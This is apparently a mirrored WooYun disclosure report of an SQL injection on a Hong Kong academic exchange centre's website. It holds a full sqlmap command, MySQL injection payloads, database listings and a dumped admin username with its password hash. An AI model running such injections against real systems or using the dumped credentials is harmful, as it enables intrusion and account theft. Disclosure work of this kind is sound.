乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-11: 细节已通知厂商并且等待厂商处理中 2015-10-15: 厂商已经确认,细节仅向厂商公开 2015-10-25: 细节向核心白帽子及相关领域专家公开 2015-11-04: 细节向普通白帽子公开 2015-11-14: 细节向实习白帽子公开 2015-11-29: 细节向公众公开
香港学术交流中心某处存在SQL注入漏洞(可得到登陆密码)
香港学术交流中心某处存在SQL注入漏洞(可得到登陆密码)注入地址:http://**.**.**.**/articles/?do=view&l=299&catalog_id=367&article_id=891使用sqlmap进行测试:
python sqlmap.py -u "http://**.**.**.**/articles/?do=view&l=299&catalog_id=367&article_id=891" --dbs --random-agent -p l --technique=BE -D essqlsite30 -T man_login -C login_name,login_pwd --dump
---Parameter: l (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: do=view&l=299' RLIKE (SELECT (CASE WHEN (4662=4662) THEN 299 ELSE 0x28 END)) AND 'wQJK'='wQJK&catalog_id=367&article_id=891 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: do=view&l=299' AND (SELECT 2555 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(2555=2555,1))),0x71716a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VAbx'='VAbx&catalog_id=367&article_id=891---web application technology: Apacheback-end DBMS: MySQL 5.0
available databases [4]:[*] essqlsite30[*] information_schema[*] test[*] test_epl20
Database: essqlsite30[23 tables]+--------------------+| article_attachment || article_image || article_thread || assoc_queue || catalog_extra || item_catalog || man_login || man_remark || man_sessions || member_group || membership || module_interface || people || people_sessions || priv_group_role || priv_rule_set || privilege_group || privilege_module || privilege_rank || privilege_role || setting || setting_extra || setting_global |+--------------------+
Database: essqlsite30Table: man_login[8 columns]+------------------+-------------+| Column | Type |+------------------+-------------+| lastlogin_ip | varchar(64) || lastlogin_time | int(11) || login_name | varchar(64) || login_pwd | varchar(32) || muid | varchar(32) || total_logintimes | int(11) || total_onlinetime | int(11) || whether_locked | char(1) |+------------------+-------------+
+------------+----------------------------------+| login_name | login_pwd |+------------+----------------------------------+| adminsxbhk | 30a74edfd207515c532a6abae75d2174 |+------------+----------------------------------+
可惜解不开密码。。希望能过。
加上WAF。
危害等级:中
漏洞Rank:8
确认时间:2015-10-15 12:52
已聯絡相關機構處理
暂无